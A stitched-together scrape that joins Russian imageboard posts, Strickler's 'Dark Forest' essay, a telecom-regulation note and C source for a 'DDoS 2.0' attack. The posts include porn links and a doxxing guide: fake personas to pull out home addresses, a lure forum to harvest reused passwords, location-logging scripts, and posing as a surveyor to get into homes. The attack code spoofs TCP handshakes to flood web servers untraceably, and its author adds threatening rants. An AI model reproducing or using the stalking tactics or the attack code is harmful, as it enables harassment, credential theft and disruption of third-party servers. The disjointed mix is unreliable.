Помню, что когда я был "фашистом", админ 23-его "забанил" меня по причине пропаганды национализма на его сайте с доменом ru. Но кто бы мог подумать, что на домене РФ свободно постится хентай, риал прон и наци-эксплатейшн. Кушайте на здоровье: http://копанина.рф/publ/1/5-1-0-272.
Ок, давайте вместе искать инопланетян. Я сам начну, а вы кидайте проги для поиска и разные файлы, да сайты. Вскоре, сам что-нибудь запощу из ссылок. Удачи желающим.
Есть предложение разделится по ПС. Лично я беру сначала searx. Конечно, я понимаю, что такого рода инфа должна хранится где-то в Дипвебе, но с чего-то таки надо начинать.
>>eFM Опять же, пох. Значит, это годноты тред номер два; вот и всё. Ну, и я ещё покушать принёс: http://www.synod.us/corpses/russian%20corpse.html. Так сказать, классика в обёртке типичной корейской юмористической манхвы, но всё на пиндосском.
Нужна срочная помощь нетсталкеров. Что за саундтрек стоит в конце 3 серии "Дисциплина: Академия Хентая."? Шазам путного ничего не выдаёт. Вот этот видос: https://vidmo.org/video.php?id=466962.
>>eHs Попробую проверить на тебе свои телепатические способности. Так. Вижу, что ты мальчик. Ты дрочил вчера свою пипиську два раза.. Концентрируюсь, вижу трек. Огромные анимешние сиськи мелькают перед глазами. Играет музыка... Ба, да это же "Любэ — Комбат". Ну вот, магия помогла ещё одному человеку достичь желаемого. Обращайтесь в мой астрологический центр акушерства и взаимопомощи! Вместе мы — медведица!
Выпишите в блокнот все, что вам уже известно - ФИО, город, дата рождения или примерный возраст, ник, общие знакомые, фото.
Вводите в http://people.yandex.ru известные данные. Иногда достаточно фамилии и города проживания. Найдется много людей пролистав фото которых, вы обнаружите искомого. Узнав из его аккаунта дату рождения, повторите поиск с этим же именем, но без фамилии или наоборот с этой же фамилией но без имени, или просто по точной дате рождения - так вы найдете левые акки человека с измененным ФИО или без ФИО, но с его фотками.
Не забудьте про внутренние поисковые системы соцсетей. Также если известен ник пользователя мы всегда можем просто набрать его логин в соответствующих профилю параметрах адресной строки данной соцсети. (например vk.com/supernick)
Проверьте все известные ники человека с помощью сервисов поиска занятых ников во всех доступных соцсетях (пример подобного сервиса: https://namechk.com).
В интернете существуют бесплатные сервисы для поиска ИИН, по имени и фамилии, дате рождения и другим неполным данным. Благодаря им, можно определить полное ФИО искомого человека, а также узнать его ИИН и точную дату рождения.
Даже если человек не пишет в аккаунте свое ФИО, его всё равно можно вычислить благодаря общим знакомым или постоянным контактам, которые он добавляет в друзья. Для этого достаточно узнать круг его общения и поискать человека в друзьях у его возможных знакомых.
Есть сервис который пытается определить возраст юзера по его социальным связям https://vk.com/age_teller
Возьмите листочек с выписанными ранее уже известными данными о человеке и составляя из них различные комбинации, просто вводите их в поиске Яндекса и Гугла.
Если вам известен номер сотового - воспользуйтесь приложением getcontact или Telegram ботом @get_contact_bot
Кроме этого можно добавить номер сотового в свои контакты на смартфон с установленными ВК, Viber, Whatsapp и импортировать в эти программы номер, чтобы увидеть сидит ли человек там, и извлечь с аккаунтов дополнительную информацию - например фото с Whatsapp.
Еще можно воспользоваться платным ботом @Smart_SearchBot - там можно получить инфу о человеке по его id ВК, номеру сотового или e-mail.
Поиск по фото - в настоящее время самым лучшим вариантом является сайт findclone.ru или программа на смартфон. Есть бесплатный вариант https://findmevk.com Достаточно залить фото человека, и если он есть ВК то покажет его профиль.
Любая JPEG фотография, сделанная смартфоном с включенным GPS и присланная вам через мессенджер обычно содержит EXIF заголовки, которые позволяют определить место съемки.
Обратите внимание на то, как человек описывает свое отношение к другим, что его друзья пишут о нем самом. Тут, конечно, стоит не только уметь внимательно читать, но и знать различного рода тонкости, например, то, что можно в соцсети ВК искать упоминания о человеке с помощью следующего URL-запроса: vk.com/feed?obj=ID&q=§ion=mentions где ID – это идентификатор пользователя ВК, который можно узнать, наведя курсор, например, на кнопку «Отправить сообщение»: цифры в ссылке и будут его ID. Также можно узнать ID ВК наведя курсор на фото аватарки человека.
Некоторые ставят лайки всему, что видят, от кого-то лайка никогда не дождешься, но, в основном, люди довольно избирательны в этом деле и вот тут очень интересно посмотреть статистику того, кто или что собирает максимум лайков от нашего человека. Хорошо, что появляются сервисы, позволяющие этот интересный процесс анализа автоматизировать, например, такие как searchlikes.ru
Узнав увлечения человека, группы, в которых он состоит ВК, исследователь может создать очень интересный для него сайт, где нужно регистрироваться (например, форум). Наполнив данный сайт интересной информацией с помощью копирования её с других ресурсов, и общаясь с объектом в интернете, ему могут подсказать ссылку на данный сайт. Есть большая вероятность, что человек при регистрации на данном сайте использует тот же самый пароль, что и для других используемых им сайтов.
Соберите на человека досье, из найденной в сети информации, далее придумайте фейковую личность противоположного пола, и зарегистрировав фальшивый аккаунт, познакомьтесь с данным человеком в соцсетях. Обратим внимание на записи человека в соцсетях и сообщества в которые он вступил - они во многом отражают его внутреннее я. Зная увлечения человека, сойдитесь с ним в разговорах по его интересам, тогда он откроется, и возможно расскажет о себе больше, чем вы могли самостоятельно нагуглить.
Стараемся стать сетевым другом/подругой для человека, помогаем ему советами, не забываем рассказывать о своей вымышленной личности, говорим про отношения, про детство, про работу, а также про какие-то вещи, от которых данный индивиддум фанатеет - программирование, выращивание кактусов, разведение бультерьеров, любимая рок-группа, любимый сериал.
Узнать домашний адрес человека можно познакомившись с ним от имени противоположного пола и поинтересовавшись в каком районе города он живет. Далее по его фамилии и телефонной книге вычислить его точный адрес. Телефонные книги большинства населенных пунктов можно найти в сети интернет.
Кроме того можно сделать специальный скрипт, который залогирует местонахождение человека или его точки доступа, при заходе этого человека на web-страничку со скриптом.
Можно провести соцопрос, приодевшись и походив по квартирам его дома с официальной папочкой с бланками.. Если повезет, под видом соцопроса с красивой анкетой можно проникнуть в жилище объекта, получить ответы на некоторые вопросы, которые он сам заполнит в анкету. Помните, что подобным образом, случайные визитеры могут установить в вашем доме подслушивающие устройства или видеокамеры.
The Dark Forest Theory of the Internet This is also what the internet is becoming: a dark forest By Yancey Strickler, 10152093472805213 • May 20, 2019 Photo by Rosie Fraser on Unsplash In his sci-fi trilogy The Three Body Problem, author Liu Cixin presents the dark forest theory of the universe. When we look out into space, the theory goes, we’re struck by its silence. It seems like we’re the only ones here. After all, if other forms of life existed, wouldn’t they show themselves? Since they haven’t, we assume there’s no one else out there. Liu invites us to think about this a different way. Imagine a dark forest at night. It’s deathly quiet. Nothing moves. Nothing stirs. This could lead one to assume that the forest is devoid of life. But of course, it’s not. The dark forest is full of life. It’s quiet because night is when the predators come out. To survive, the animals stay silent. Is our universe an empty forest or a dark one? If it’s a dark forest, then only Earth is foolish enough to ping the heavens and announce its presence. The rest of the universe already knows the real reason why the forest stays dark. It’s only a matter of time before the Earth learns as well. This is also what the internet is becoming: a dark forest. In response to the ads, the tracking, the trolling, the hype, and other predatory behaviors, we’re retreating to our dark forests of the internet, and away from the mainstream. This very piece is an example of this. This theory was first shared on a private channel sent to 500 people who I know or who have explicitly chosen to receive it. This is the online environment in which I feel most secure. Where I can be my most “real self.” These are all spaces where depressurized conversation is possible because of their non- indexed, non-optimized, and non-gamified environments. Podcasts are another example. There, meaning isn’t just expressed through language, but also through intonation and interaction. Podcasts are where a bad joke can still be followed by a self-aware and self-deprecating save. It’s a more forgiving space for communication than the internet at large. Dark forests like newsletters and podcasts are growing areas of activity. As are other dark forests, like Slack channels, private Instagrams, invite-only message boards, text groups, Snapchat, WeChat, and on and on. This is where Facebook is pivoting with Groups (and trying to redefine what the word “privacy” means in the process). These are all spaces where depressurized conversation is possible because of their non- indexed, non-optimized, and non-gamified environments. The cultures of those spaces have more in common with the physical world than the internet. The internet of today is a battleground. The idealism of the ’90s web is gone. The web 2.0 utopia — where we all lived in rounded filter bubbles of happiness — ended with the 2016 Presidential election when we learned that the tools we thought were only life-giving could be weaponized too. The public and semi-public spaces we created to develop our identities, cultivate communities, and gain knowledge were overtaken by forces using them to gain power of various kinds (market, political, social, and so on). This is the atmosphere of the mainstream web today: a relentless competition for power. As this competition has grown in size and ferocity, an increasing number of the population has scurried into their dark forests to avoid the fray. The web 2.0 era has been replaced by a new “Web²” era. An age where we simultaneously live in many different internets, whose numbers increase hourly. The dark forests are growing. The dark forests grow because they provide psychological and reputational cover. They allow us to be ourselves because we know who else is there. Compared to the free market communication style of the mass channels — with their high risks, high rewards, and limited moderation — dark forest spaces are more Scandinavian in their values and the social and emotional security they provide. They cap the downsides of looking bad and the upsides of our best jokes by virtue of a contained audience. This is a trade more and more people are looking to make. The Bowling Alley Theory of the Internet I went dark on the internet a few years ago. I took social apps off my phone, unfollowed everyone, the whole shebang. This was without a doubt a good decision. I’ve been happier and have had better control over my time since. Many others have done this and are doing this. A generation of modern wannabe monks. But even as my personal wellness grows, I see a risk in this change. You could argue that these decisions removed me from the arena. I detached from the mainstream of conversation. I stopped watching TV. I stopped looking at Facebook and Twitter. I silenced my voice on the platforms where the conversation was happening because of the strings, risks, and side effects they created in return. This detachment wasn’t just in politics. It was also true of how I shared my personal life. Milestones for me and my family were left unshared beyond our internet dark forests, even though many more friends and members of our families would’ve been happy to hear about them. Those of us building dark forests risk underestimating how powerful the mainstream channels will continue to be. Not sharing was my choice, of course, and I didn’t question it. My alienation from the mainstream was their loss, not mine. But did this choice also deprive me of some greater reward? Not everyone who joined a bowling league (when people did such things) loved bowling. Many loved being with other people first and bowling came second or not at all. Being together is what mattered. The venue did not. This is the Bowling Alley Theory of the Internet: that people are online purely to meet each other, and in the long run the venues where we congregate are an unimportant background compared to the interactions themselves. Did we meet on MySpace, Tinder, or LinkedIn? Does it matter? When I went offline for reasons of personal wellness and productivity, I stopped going to the bowling alleys altogether. But lately, I’ve started to question that decision. I’m reminded of what happened in the 1970s when the hippies — bruised and bloodied from the culture wars of the ‘60s — retreated into self-help, wellness, and personal development, as Adam Curtis documents in his series The Century of Self. While they turned inward, the winners of the ‘60s culture wars took society’s reins. A focus on personal wellness created an unintended side effect: a retreat from the public arena, and a shift in the distribution of power ever since. It’s possible, I suppose, that a shift away from the mainstream internet and into the dark forests could permanently limit the mainstream’s influence. It could delegitimize it. In some ways that’s the story of the internet’s effect on broadcast television. But we forget how powerful television still is. And those of us building dark forests risk underestimating how powerful the mainstream channels will continue to be, and how minor our havens are compared to their immensity. The influence of Facebook, Twitter, and others is enormous and not going away. There’s a reason why Russian military focused on these platforms when they wanted to manipulate public opinion: they have a real impact. The meaning and tone of these platforms changes with who uses them. What kind of bowling alley it is depends on who goes there. Should a significant percentage of the population abandon these spaces, that will leave nearly as many eyeballs for those who are left to influence, and limit the influence of those who departed on the larger world they still live in. If the dark forest isn’t dangerous already, these departures might ensure it will be.
Представленные Минкомсвязью "угрозы" уже являются организационно-техническим обеспечением устойчивого функционирования сети связи, установленные в 2007 году самой же Минсвязью.
- целостность - устойчивость
В новом проекте "угрозы" практически дословно повторяют уже действующие.
Приказ Минсвязи РФ от 27 сентября 2007 г. N 113 "Об утверждении Требований к организационно-техническому обеспечению устойчивого функционирования сети связи общего пользования".
/ DDoS 2.0 - Merry X-Mas This will be ready to go cyber warfare weapon which is fully untracable, and impossible to filter.
The final version seems to function properly. It is meant as example code to be designed using some passive surveillance systems API. This single file should give enough general overview information for a team to understand, develop, and deploy attack software into their nodes. I will leave some notes through my own development to help with any thought process. It was performing somewhere around 400k connections a minute for 15k index.html here. It could, and should be substantially higher. I am using a simple laptop running Linux with VMware. The fact that the client is completely stateless means that most of the bottleneck was directly related to server side setup. If you are performing the attack across multiple web servers, and requesters depending on which is your target then the ceiling shouldnt exist unless the boxes are down. That is the whole point.
How does this attack work: 1) It creates a network listener for SYN/ACK packets.
2) It takes a list of webservers, and requester IP addresses. It has to be able to passively monitor at least one sides sequence parameters from TCP/IP.
3) It sends a SYN packet to the web server using a specially generated sequence number. It will loop for handling this to perform a full on massive attack.
4) The listener thread will receive the SYN/ACK packet looking for a particular range. If the source port of the HTTP client receiving the SYN/ACK packet matches within this range, then it will determine if the magic sequence matches one it may have generated. If this magic sequence does in fact match then it will respond with the final ACK packet, and to speed things up even further it will attach the HTTP request directly to the third packet of the TCP/IP handshake. Notice: in the future, this is the ONLY way to filter it. I left the ACK as a separate packet commented out below in the Attack2() function. See: (#define) ENABLE_TWO_PACKET_PHASE_2
Why can't this be firewalled?
1) It is similar to how users on the Internet cannot stop people from obtaining their traffic through backbone routes. The TCP/IP protocol was not built to withstand these types of scenarios. Quantum Insert was built as an attack on this infrastructure to weaponize it for the NSA to infect web browsers with viruses. It takes that same concept, and weaponizes it further where it could be used to generate the biggest attacks nobody has even seen yet as of today. The general approach of opening a TCP/IP connection, and requesting a webpage is so ubiquitous that no firewall in the world could ever determine an easy portable way to solve this vulnerability. It is why the NSA now focuses on Quantum Insert attacks, and claimed 80% success rate as of 2013 for their targets. The browsers cannot do anything to stop it as such the web servers cannot in this scenario.
2) The things to change if you know people have firewalled this attack would be the magic sequence algorithm, source port, and enable the extra TCP/IP handshake packet without data.(ENABLE_TWO_PACKET_PHASE_2) The rest is so 'normal' that it'll be an issue as long as TCP/IP as a protocol is being used globally.
Other things to consider.
1) RST packets get sent from a client to the web server if it receives a SYN/ACK that it didn't initiate a connecction for. It will close the connection on the web server. The connection will be dropped sometimes before the entire request gets returned. It is possible it will have processed some, or all of the data. I was seeinng 40% rate locally. Locally means the RST was arriving immediately, although the data transfer should have been higher as well. The next thing matters in these cases. In countries where the monitoring systems are also firewalls then you can filter out these RST packets for your ranges of source ports as you attack, or you can implement the full blown magic sequence verification if you have a good team of developers.
2) TCP/IP options and PSH/SACK are used to increase overall transmission speed on the Internet. It allows a web server to send a large buffer as multiple fragmented packets without waiting for the ACK packets of each individual packet. It allowed Google to send me 15k without any verification whatsoever. I am just using the main root directory in my web request. It is extremely simple to find web URLs which will have much higher content length than 15k.
I created two source files for these 2 things: cyberwar_findips.c (checks for RST responses), and cyberwar_checkpsh.c (checks if a host uses PSH, incomplete)
3) HTTP Flooders either use SYN option, or request a web page. This is a different kind of attack here as well. It will keep open connections in the kernel sort of in limbo becuase it is further than a SYN into the TCP/IP stack after it requests the data, and it suddenly stops processing the TCP/IP states. The web server will use its maximum TCP/IP timeout interval attempting to solve these issues. It will happen for every connection. It is not something I have personally seen public yet.
Any of my code that is incomplete still has the full blown concepts, and ideas. I just didn't have a chance to test them thoroughly.
I will attempt to complete a PDF explaining the attack. I want to release this before X-Mas so if it doesn't arrive with it today, then it will come tomorrow.
Older notes:
The point of this is to go from 30,000 connections a minute to as many as possible. I will attempt to make this as small and concise as possible... I'd like it to be modular enough to work diretly in routers. It can have the option branching off the packet sending to other boxes keeping things minimum on routers, and it should work fine.
A lot of the packets can be automatically determined thus only one single SEQ from remote webserver is really required. One connection to the webserver along with that seq will give us a roadmap for every following connection of the same request, and if the web server is using PSH which most are... itll send back the entire response. example: Seq (or ACK if remote side) increases by the size, and on some TCP/IP flags by one.. the same request will affect the SEQ by the same amount if done equally... the remote side will send back a full response, and even further packets regardless of receiving anymore proper SEQs so if the remote side has somme dynamic scrits such as PHP, etc.. and its SEQ cannot be foreseen.. its already too late and the damage is done. This is why only a SINGLE SEQ (initial) is required. The burden is decreased greatly because of this. Quantum Insert's entire framework could be weaponized worldwide immediately today due to their infrastructure already being in place, etc.
Do not fear. A lot of other companies, ISPs, etc all have networks with passive monitoring that you can hack so you can be a world class cyber warrior as well.
The games are no longer just for the NSA. I bring you fun. DDoS 2.0.
Impossible to firewall, impossible to trace... just pure cyber warfare.
1 simulated connection using the same data will give us a list of how we expect the packets to these servers to respond (just in case their tcp/ip protocol varies a tiny bit)... what we need? every packets SEQ/ACK fromm both sides, and the sizes since HTTP doesnt require the remote side to give ANy data abefore we send our request, and itll respond immediately... unless our request is bigger than 1 window (1500) then itll prob be 100% no issues
oh wow.. ipv6 is another thing entirely.. it takes a simplle attack, and allows destroying networks with smalller networks.. insane. the more IPs is better for connectivity but extremely tough for firewalling, etc
very expensive rape huh? the damages will not be known for a long time.. like i mentioned in my fax to congress... still think these rapists will walk away? im far fromm done.. no more demonstration just straight damage. alrighty.. i was drugged 4 days ago.. dont blame anyone but all of yourselves. I bet in the future you don't take me as doing nothing as the end of things. Its called strategy. I just wanted to ensure nobody would be left.
and they say you have to join, and wait to be on the inside to destroy something/someones way.. im pretty sure ill have everyone out of the way before that option ever arrives.
version 2-----
Two nodes, or a helper server can monitor and keep track of port 80 requests (somme) and autoatically check,and add them to a list which would populate the system in a way where it would require zero people to perform massive attacks.. it would auto configure itself, and know which IPs are useful without anyone ever updaating, or modifying the system
automation at its best.
----- in my tests there is a certain timing that is almost perfect.. which means more testing needs to take place.. an automated verification of each router/passive monitor and the attacks its building can be made to perform the attacks.. its probably just the TCP/IP engine, and it sending another retransmission if it does/doesnt receive a packet in time i w as able to get the new system with SEQ up to 30k (which means the other system should work at 60k) but when I fixed somme bugs(slow downs, etc) in the packet system for sending/recv the connections overall requests dropped.. im assuming it became too fast... also this is slower than the other becausde it doesnt CLOSE connections... on a masasive router you do noot wanna close every connecction.. now that we are down to 2 packets especially... anyways ill try to work out the magic timings and then it can be built into an initial phase which tests all web servers before performing full blown attacks
side note: all of the 50% ones that were 200 respoonse but 0 bytes ini the http logs.. those were RESET connections.. so even without scanning properly, and finding/filtering RST the attacks are stil 50% succesful.. so .. the attack is still massively plausable without even doing due dilligence and things propery... so the attack can be used immediately with barely any preparation, or filtering..
whether or not RST packets are good, or bad depends on the web server... for apache: blocking RST packets is good.. for NGINX it seems to be bad.. however i think if sending precalculated ACKS then it should function ok depending on the web servers load anfd how it fragments packets.. i believe itll all be equal majority of time for these small packets !!! todo: SEQ analysis to determine over an attack how the load changes
nginx seems to perform some socket action which kills the webserver completely if the attack is performed... it might be some way to destroy an nginx server with just a single machine due to the way it functions w the tcp/ip stack.. it happens before the page is returned.. and it shows as a 500 error in the error log
apache doesnt seem to deal w that bug the same.. maybe its not a bug as much as just the configuration.. anywaays it seems to work as fast as the web server can process
automation: with libpcap/libnet portable version. we can look for traffic ont eh local network, and auto discover which side can be used IE: if we send to a port 80 and see it respond out.. then we know we can manipulate that if we control the IP and vice versa... if we send to an IP, and see a result.. we can control it
if it works on both sides, then we can begin to check and auto populate ranges we can use... it should be able to automate the attack 100% from any type of passive monitoring network
then on top of that the RST verification, and PSH erification can be used.. thbey are all building blocks to an ultimate unstoppable attack (that any ISP can do really) this isnt even the worse thing im going to release.
for portable version: ill just make it listen to all devices... which means it can auto generate its attack parameters for each network this means i wont have to worry about people configuring it whatsoever.. and they can put in an IP for attacking and it can automamtically find the route/device which it would work with.. and worse case i f it cannot determine ahead it can try the attack while monitoring to determine if itll be reachable/work, and advance to the next
/ / Overview of TCP/IP connection for web request: 1: SYN seq:0 ack:0
This is the ONLY packet we care about... the rest is calculated. 2: SYN,ACK seq:0 ack:1
3 & 4 are both ours, and possibly can be turned into a single PACKET.. but always can be a single transmission.. ill check into single packet but for now who cares maybe not if the tcp/ip protocols dont process it the same until its literallly activated --- everything below is irrelevant -- 5: ACK 6: DATA 200 OK... 7: DATA1 <HTML> 8: DATA2 .... etc..etc... ..... 15:PSH,FIN,ACK </HTML> 16:FIN,ACK 17:ACK --- end of connection
As you can see.. the first four packets are the only which matter. The rest are irrelevant, and actually... The 3rd, and 4th can be sent practically together. The good thing about this is... we only have to process a single source port one time per connection. The limitation of not closing connections properly is that if we are attacking using some service such as google then there is a 5 minute timeout for all 65535 ports.. not a huge limitation. I doubt it'l eever matter since this is just a SINGLE web server when we can target many many more. If done properly, and timed correctly we can pick and choose our source ports, and sequence numbers for our side by timing (literally time(0)) because this means we will completely ignore all future packets fromm connections we are establishing without ever processing it purely by a simple checksum, and the timing.. in reality if we only allow things that match the current time (if we limit it to 1.5-2 seconds) then nothing beyond that window will even reach our code.
This is a substantial speed increase from my virtual tcp/ip stack which required verifying everything. I hope I can test it on a local vmware tomorrow...
epoch can be virtualized and modulated by years, then months/weeks, days, and then hours, minutes and into seconds.. then we can create tcp/ip slices (windows) and generate our SEQs using this so that whenever the target web servers respond we then generate immediately the 2 packets its expecting... the remote side should process them in order and worse case we put a small delay on the outgoing queue but we never allow those same SEQ, or source port for the next slice.. therefore the algorothm is constantly choosing/changing
this is the fastest i ve comme up with somme far to handle this situation
since algo complete.. i removed notes containing gibberish
thats the whole application right here.. time to finish code, clean it up.. and also attempt to find main routers onlines code so i can integrate it or at least have a practically ready to go system for anyone to begin testing...
trust me.. it works.
return 1;
for pre-generation attack packeets ahead of time (so we can queue with different processors, or cards, or boxes to distribute them out) instead of using queue with timers.. and loops.. we can put the delay till the next packet, or section directly into the array itself so its a single stream (but must test output buffer ability)
time slices of a single second should be fine for the entire operation... any host that are slower we probably wont use for attacks, although it may be plausible to increase time slice over time depending on amount of IPs being pushed to the web server /
// to find either web servers which respond in an area for targeting some IP... // so it goes liek this: we need to choose some IP we have access to for either attacking, or receiving the attack // either side needs to be on one side of the passive tap // if we are at a big backbone somewhere, or an ISP router then we can use virtually all traffic without being directly inside of boxes in that network... // up to the services we are spoofing (http is most effective for this right now for this example) but is limited by X connections per server // we can always just find more IPs that pass through the router...passive monitors which employ quantum insert could essentially // manipulate, and give that SEQ (one single packet we need to perform the spoofed HTTP request) for a lot of IPs
// okk so lets say you want to attack some datacenter in miami to knock some service offline.. // takke the range, and scan with it to a webserver under your control.. the scan shoudl spoof packets fromm that service, and you should be under control of a router // either around the web servers your spoofing the connection to, or near the place your attacking (either way is untracable) // as long as you can get that single SEQ you are good to go for but this we need to find dead IPs which will not respond with RST whenever they receive packets // foro things they have not had anything to do with // so for now the whole concept is TO send them SYN/ACK packets and monitor for their RST to gather IPs under their ranges which are acceptable spoofing IPs // without having to worry about another mechanism i use // it does mean that a form of quick protection is to respond with RST, but you could also include a firewall in the rouuters passing the traffic to filter this // by specific SEQ/source ports which will not be passed through // once you have the IP list.. then those aree the IPs you rotate for this attack.. and depending on where you are located to get the SEQ // you can rotate web servers as well (unless you are only monitoring an isp with major web traffic then you have to pick ranges on their network specifically) // to the web traffic itll look like real requests fromm the clients, and to them they'll see the packets comming back and not understand why initially // the person receiving the transmissions will assume they are being hacked.. nobody will really knnow whats going on .. for awhile anyways // manipulate TTL to push concepts away fromm the routers
// the seq is split up by bits to contain information to help us determine whether it was generated by us // for an attack.. this removes need for holding information in memory.. // and allows processing for far more attack packets from routers directly.. // and it may allow (for groups with enough funding) to implement inline firewalling to block the RST packets // which would allow performing the attack on ANY ip (not just ones you verify against cyberwar_findips) typedef struct _seq_oracle { unsigned char time_a : 4; unsigned char time_b : 4; unsigned short ip : 8; unsigned short port : 8; unsigned short chk : 8; } SequenceOracle;
typedef union { SequenceOracle bits; uint32_t full; } Oracle;
// if we ONLY monitor for SYN+ACK AND pass this... regardless of some time warp it shoould still function properly.. // a better version can be done but im just winging this to get it released quickly... it wont take long to redo // keeping this.. will prob do a libnet/libpcap version so people can use immediately tomorrow int packet_filter(uint32_t seq, uint32_t ip, unsigned short port, uint32_t ts, uint32_t gen) { Oracle xyz; int i = 0;
for (i =0; i < 5; i++) { xyz.bits.time_a = ((ts + i) / 2) & 0x0000000f; xyz.bits.time_b = ((ts + i) % 2) & 0x0000000f;
// this allows us to generate the SEQUENCE for outgoing packets... if (gen != NULL) { gen = xyz.full; return 1; }
if (xyz.full == seq) return 1;
return 0; }
// determine if a packet was sent by us, or a helper box which is initiating all attacks... // this will keep minimal CPU usage... these few mathematics are much more efficient than doing linked lists, or arrays // This design resets every 30 seconds.. its enough time for new packets to become discarded.. and considering we only monitor for SYN+ACK.. // Its win win int FilterIsOurPacket(PacketBuildInstructions iptr) { Oracle xyz; int i = 0;
// first check to weed out bad is high source port if ((iptr->destination_port < range) || (iptr->destination_port > (range+5000))) return 0;
// first we ensure its SYN|ACK if (!(iptr->flags & TCP_FLAG_SYN) && (iptr->flags & TCP_FLAG_ACK)) return 0;
// now we use the addresses to create a small magic sequence like a checksum.. and itll // tell us if the packet is infact our attacks if (packet_filter(iptr->ack, iptr->destination_ip, iptr->destination_port, iptr->ts, NULL)) return 1;
return 0; }
/ first we will use my network API ... and then modify it to make it standalone for routers ill try to implement fully on Bro IDS just to show exampes of using..... with a single router exploit this could be automatically installed on mass routers worldwide preparing for use... remember.. if on passive taps, or major ISPs... its 100% untracable depending on your TTL / PacketBuildInstructions CW_BasePacket(uint32_t src, int src_port, uint32_t dst, int dst_port, int flags) { PacketBuildInstructions bptr = NULL;
// generate ACK packet to finalize TCP/IP connection opening if ((bptr = (PacketBuildInstructions )calloc(1, sizeof(PacketBuildInstructions))) == NULL) return NULL;
// for now we will use my network.c but it should be easy to modify incoming to receive all packets which match a criteria later... int Cyberwarefare_DDoS_Init(AS_context ctx) { int ret = -1; NetworkAnalysisFunctions nptr = NULL; FilterInformation flt = NULL;
// lets prepare incoming ICMP processing for our traceroutes if ((flt = (FilterInformation )calloc(1, sizeof(FilterInformation))) == NULL) goto end;
// initialize w empty filter.. we want everything. FilterPrepare(flt, 0, 0);
// now lets change the filter... // lets specify SYN/ACK for filter.. its not in the API yet.. it was added last // ill just do it manually like this flt->flags |= FILTER_PACKET_FLAGS; flt->packet_flags |= TCP_FLAG_SYN|TCP_FLAG_ACK;
// clear other hooks ctx->IncomingPacketFunctions = NULL;
// add into network subsystem so we receive all packets if (Network_AddHook(ctx, flt, &Cyberwarefare_Incoming) != 1) goto end;
ret = 1;
end:; return ret; }
int Cyberwarfare_SendAttack1(AS_context ctx, uint32_t src, uint32_t dst, int ts, OutgoingPacketQueue optr) { uint32_t magic_seq = 0; PacketBuildInstructions bptr = NULL; int src_port = range + rand()%5000;
// build packet for opening connection to initiate the attack bptr = CW_BasePacket(src, src_port, dst, 80, TCP_FLAG_SYN|TCP_OPTIONS|TCP_OPTIONS_TIMESTAMP|TCP_OPTIONS_WINDOW);
if (bptr) { // build magic SEQ so we dont have to keep track of connections.. (golden for executing this attack from massive gbps routers) packet_filter(0, src, src_port, ts, &magic_seq);
// calling function will perform this task //if (optr) OutgoingQueueLink(ctx, optr);
PacketBuildInstructionsFree(&bptr); return 1; }
return 0; }
// this sends the request to the http server from the ip adddress.. all information required is already in the packet itself.. no need to keep track of anything. int Cyberwarfare_SendAttack2(AS_context ctx, PacketBuildInstructions iptr) { PacketBuildInstructions bptr = NULL; uint32_t header = rand()%0xffffffff; OutgoingPacketQueue optr = NULL;
// we only neeed the data we are going to respond to.. // ANY server sending us ACK+SYN which matches our magic seqeuence identifiers will have this data sent to it... // in memory space is extremely small.. doable for any router. // this mainly has to contain "GET / HTTP/1.0\r\n\r\n" until people begin blocking it... or you'd like to hit a bigger URL under a ServerHost char req_data[] = "GET / HTTP/1.0\r\n\r\n"; int req_data_size = sizeof(req_data);
// build ACK for the servers SYN|ACK bptr = CW_BasePacket(iptr->destination_ip, iptr->destination_port, iptr->source_ip, iptr->source_port, TCP_FLAG_ACK|TCP_OPTIONS|TCP_OPTIONS_TIMESTAMP|TCP_OPTIONS_WINDOW); if (!bptr) return 0; bptr->seq = iptr->ack; bptr->ack = iptr->seq; bptr->header_identifier = header++;
// put in queue for wire NetworkQueueInstructions(ctx, bptr, &optr);
// free first packet PacketBuildInstructionsFree(bptr); #endif // now build packet for http request (GET .....) bptr = CW_BasePacket(iptr->destination_ip, iptr->destination_port, iptr->source_ip, iptr->source_port, TCP_FLAG_ACK|TCP_OPTIONS|TCP_OPTIONS_TIMESTAMP|TCP_OPTIONS_WINDOW); if (!bptr) return 0; bptr->seq = iptr->ack; bptr->ack = iptr->seq; bptr->header_identifier = header++;
// obviously this can be optimized to not need to be replicated.. but it would breakk other things.. // besides this has to be redesigned for a router.. etc.. its showing a full example of how it works. // for massive attacks. take your top 3 coders and spend a single day.. it doesnt take long once you have // the packet access... bptr->data = &req_data; bptr->data_size = req_data_size; bptr->data_nofree = 1;
// put in queue for wire NetworkQueueInstructions(ctx, bptr, &optr);
// push both to wire if (optr) OutgoingQueueLink(ctx, optr);
// all packets reacch this function so that we can determine if any are for our network stack int Cyberwarefare_Incoming(AS_context ctx, PacketBuildInstructions iptr) { int ret = 0;
// we need to analyze the current time, source ports, and then determine if its for an attacak // the timme slice should invalidate.. and this should get moved directly after reading fromm network kdevice if (FilterIsOurPacket(iptr)) { Cyberwarfare_SendAttack2(ctx, iptr); ret = 1; }
end:; return ret; }
// this sends the initial syn packets to the web server fromm each IP... // it does not handle logic of what side of passive tap, or whatever.. it expects all that to be worked out ahead of time void start_attack(AS_context ctx) { char tags[] = { "A1", "00", NULL }; int web_i = 0, req_i = 0, start = 0, count = 0; IPAddresses webservers = NULL; IPAddresses requesters = NULL; int ts = 0; OutgoingPacketQueue optr = NULL; int fast = 1; int skip = 0; int out_count = 0;
// push packets as quickly as possible if it takes more than 1 second to send them all... otherwise our magic SEQ falls out of its time slice //if ((time(0) - ts) > 1) fast=1;
// push all packets together if (!fast && optr) { OutgoingQueueLink(ctx, optr); optr = NULL; }
// added a second call to this outside of AS_perform() to increase speed // since its a different thread... maybe irrelevant.. oh well network_process_incoming_buffer(ctx);
// this has to be adjusted.. a better system to limit needs to be in place.. not yet // it can be a controlling factor... up to you if (!(count++ % 500)) skip = 5; //sleep(10); }
//pthread_exit(0); }
int main(int argc, char argv[]) { AS_context ctx = Antisurveillance_Init(0); int i = 0, r = 0; int bad = 0; pthread_t attack_thread_handle; char files[] = { "webservers", "requesters", NULL }; char tag[] = { "A1", "00", NULL };
if (argc == 2) { i = atoi(argv[1]); if ((i < 1) && (i > 32)) i = 1+rand()%20; range = i 2000; srand(time(0) + range); }
if (ctx == NULL) { printf("coouldnt initialize new context\n"); exit(-1); }
// open and turn both files into IPaddress lists i = 0; while (files[i] != NULL) { r = file_to_iplist(ctx, files[i], tag[i]);
// if it failed.. bad=1 if (r <= 0) { printf("failedd to load %s [%s]\n", tag[i], files[i]); bad = 1; break; }
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